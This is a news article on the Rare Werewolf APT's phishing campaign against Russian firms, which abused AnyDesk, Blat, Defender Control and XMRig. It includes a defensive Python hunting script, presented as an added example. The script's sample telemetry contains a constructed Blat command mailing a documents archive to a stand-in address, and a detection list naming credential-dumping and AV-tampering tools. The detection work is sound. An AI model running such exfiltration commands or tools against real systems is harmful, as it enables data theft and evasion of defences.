Legit Software Turned Weapon? Rare Werewolf APT Hits Russian Orgs

The420.in Staff

The Rare Werewolf advanced persistent threat (APT) group reportedly targeted hundreds of Russian industrial firms and engineering institutions in a stealth cyber campaign. The attacks also extended to Belarus and Kazakhstan and leveraged legitimate third-party software, making both attribution and detection significantly harder.

Kaspersky identified Rare Werewolf, also known as Librarian Ghouls or Rezet, as the actor behind the operation. Active since at least 2019, the group is known for targeting organizations in Russia and Ukraine. According to Kaspersky, Rare Werewolf favors PowerShell scripts and command files over custom malware.

Phishing Used as Primary Entry Vector

The group’s initial access was reportedly achieved via phishing emails. Password-protected archive files were used to lure victims into executing malicious payloads. These payloads included a legitimate utility called 4t Tray Minimizer, which can reduce running applications to the system tray, effectively concealing attacker activity.


After deployment, the malware chain used additional tools like Defender Control and Blat. Attackers used Blat to exfiltrate stolen data via SMTP to email servers under their control.

Sophisticated Use of Scheduled Access via AnyDesk

Attackers embedded a unique PowerShell script in the payload to automate remote access to the victim’s machine each day between 1 a.m. and 5 a.m. local time. They used AnyDesk to maintain remote control, enabling stealthy operations during low-activity hours. After the activity window, the system would automatically shut down via a scheduled task.

Credential Theft and Cryptomining Goals

According to BI.ZONE, the campaign’s objectives included the theft of credentials, documents, and Telegram data. Attackers deployed tools like Mipko Employee Monitor, WebBrowserPassView, and Defender Control to disable antivirus software and extract sensitive data. They also installed the XMRig cryptocurrency miner on infected systems to exploit computing resources.
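The tool chain described above (legitimate remote-access, mailer, AV-control and monitoring utilities, plus a scheduled 1 a.m. to 5 a.m. access window) is something a defender can hunt for in endpoint telemetry. The script below is an added example written for this article, not code from Kaspersky, BI.ZONE or the attackers. It runs a simple hunt over a few constructed telemetry lines (process creations and scheduled-task creations in a made-up pipe-delimited format) and flags records that match the reported tradecraft: known tool names, scheduled tasks that fire inside the off-hours window, and a scheduled shutdown at the end of it. The executable file names used to match the products are assumptions, as is the log format.

```python
"""Hunt endpoint telemetry for the Rare Werewolf tool chain described in the article.

Added example: the log format, sample events and executable names are constructed
assumptions, not artifacts from the reported campaign.
"""
from datetime import datetime, time

# Product names come from the article; the executable-name fragments are assumptions.
SUSPECT_TOOLS = {
    "anydesk": "remote access tool (AnyDesk)",
    "blat": "SMTP mailer (Blat), possible exfiltration",
    "dcontrol": "Defender Control, AV tampering",
    "xmrig": "XMRig cryptominer",
    "webbrowserpassview": "browser credential dumper (WebBrowserPassView)",
    "4t-min": "4t Tray Minimizer, hides windows",
}

# Off-hours access window reported in the article: 01:00 to 05:00 local time.
WINDOW_START, WINDOW_END = time(1, 0), time(5, 0)

# Constructed telemetry: ts|type|key=value|... (type is "process" or "task_create")
SAMPLE_EVENTS = [
    r"2025-06-10T09:15:00|process|cmd=C:\Windows\System32\svchost.exe -k netsvcs",
    r"2025-06-10T09:16:40|task_create|task=\Microsoft\Updater|action=C:\Users\Public\AnyDesk.exe --service|trigger=01:00",
    r"2025-06-10T09:17:02|task_create|task=\Microsoft\Cleanup|action=C:\Windows\System32\shutdown.exe /s /t 0|trigger=05:00",
    r"2025-06-10T01:12:33|process|cmd=C:\Users\Public\blat.exe C:\Users\Public\docs.zip -to drop@example.com -server smtp.example.com",
    r"2025-06-10T01:30:05|process|cmd=C:\Users\Public\dControl.exe",
    r"2025-06-10T14:00:00|process|cmd=C:\Tools\AnyDesk.exe",
]


def parse_event(line):
    """Parse one pipe-delimited telemetry line into a dict with a datetime 'ts'."""
    ts, kind, *kvs = line.strip().split("|")
    rec = {"ts": datetime.fromisoformat(ts), "type": kind}
    for kv in kvs:
        key, _, value = kv.partition("=")
        rec[key] = value
    return rec


def in_window(t):
    """True if a time of day falls inside the reported 01:00-05:00 window (inclusive)."""
    return WINDOW_START <= t <= WINDOW_END


def classify(rec):
    """Return the reasons this record matches the reported tradecraft (empty if none)."""
    reasons = []
    cmd = rec.get("cmd") or rec.get("action") or ""
    # Image name = first token of the command line, stripped of its directory.
    image = cmd.split()[0].rsplit("\\", 1)[-1].lower() if cmd else ""
    for fragment, label in SUSPECT_TOOLS.items():
        if fragment in image:
            reasons.append(label)
    if rec["type"] == "task_create" and "trigger" in rec:
        fires_at = datetime.strptime(rec["trigger"], "%H:%M").time()
        # A task that fires in the window and launches a suspect tool, or the
        # scheduled shutdown that closes the window, is the pattern described.
        if in_window(fires_at) and (reasons or image == "shutdown.exe"):
            reasons.append(
                f"scheduled task {rec.get('task')} fires at {rec['trigger']}, "
                "inside the 01:00-05:00 window"
            )
    elif rec["type"] == "process" and reasons and in_window(rec["ts"].time()):
        reasons.append("executed inside the 01:00-05:00 off-hours window")
    return reasons


def hunt(lines):
    """Run classify() over telemetry lines; return (timestamp, severity, reasons) hits."""
    findings = []
    for line in lines:
        rec = parse_event(line)
        reasons = classify(rec)
        if reasons:
            severity = "high" if len(reasons) >= 2 else "medium"
            findings.append((rec["ts"].isoformat(), severity, reasons))
    return findings


if __name__ == "__main__":
    for ts, severity, reasons in hunt(SAMPLE_EVENTS):
        print(f"[{severity}] {ts}: " + "; ".join(reasons))
```

On the constructed events the benign svchost line is ignored, the daytime AnyDesk launch is reported at medium severity (a legitimate tool on its own is weak evidence), and the off-hours Blat, Defender Control and scheduled AnyDesk/shutdown tasks are reported as high because two independent indicators coincide. In a real deployment the matching would run over process-creation and scheduled-task events from the endpoint agent rather than a hand-built format, and the tool list would be tuned to what is actually sanctioned on the estate.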


The disclosure comes as Positive Technologies reported a separate financially motivated group dubbed DarkGaboon, which has been targeting Russian entities using the LockBit 3.0 ransomware. First observed in early 2025, DarkGaboon operates independently of the LockBit RaaS affiliate network and uses publicly available tools like XWorm and Revenge RAT, without evidence of data exfiltration.

Detection Challenges Escalate

Security researchers highlighted that the use of well-known legitimate software by both Rare Werewolf and DarkGaboon makes detection difficult and complicates attribution. Kaspersky noted:

“It is a common technique to leverage third-party legitimate software for malicious purposes, which makes detecting and attributing APT activity more difficult.”

As cyberattacks grow more sophisticated and APT groups blend into normal system activity, security experts urge organizations to enhance behavioral monitoring and endpoint visibility to detect and counter stealthy threats.

About the author – Ayush Chaurasia is a postgraduate student passionate about cybersecurity, threat hunting, and global affairs. He explores the intersection of technology, psychology, national security, and geopolitics through insightful writing.
